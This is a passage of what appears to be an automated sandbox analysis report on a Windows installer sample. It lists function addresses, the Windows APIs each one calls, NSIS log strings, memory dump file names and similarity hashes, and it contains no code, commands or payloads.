Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

133, xrefs: 00402770
<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: 133$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-192978010
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.2129554687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2129536463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129573340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129594340.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129683244.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Okfjk1hs4kdhs2.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

